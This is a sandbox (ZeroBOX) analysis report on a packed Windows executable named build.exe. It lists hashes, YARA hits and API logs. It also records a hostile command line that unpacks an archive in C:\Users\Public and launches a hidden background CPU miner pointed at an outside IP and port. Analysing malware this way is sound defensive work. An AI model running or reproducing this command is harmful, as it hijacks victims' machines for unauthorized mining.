popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

build.exe

UPX PE64 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 15, 2023, 8:25 a.m. Dec. 15, 2023, 8:34 a.m.
Size 358.9KB
Type PE32+ executable (console) x86-64, for MS Windows
MD5 fc887357dde165e9b08b72b2202d5ca2
SHA256 55072bf248e6d52ddda86827cf40002ec216a8e92e1dbfd01a6e1d8b69c3b010
CRC32 F1E7BBC7
ssdeep 6144:uqphllr9ZNSMfOhIiP7Hm089dvYFZloH8:11r3/feIiP7mTvvYFZloH8
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: '7.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
cmdline C:\Windows\system32\cmd.exe /c cd C:\Users\Public\ && 7.exe x runing.7z && cd C:\Users\Public\runing && runing.exe -o 103.106.228.22:5335 --cpu --cpu-max-threads-hint 60 -B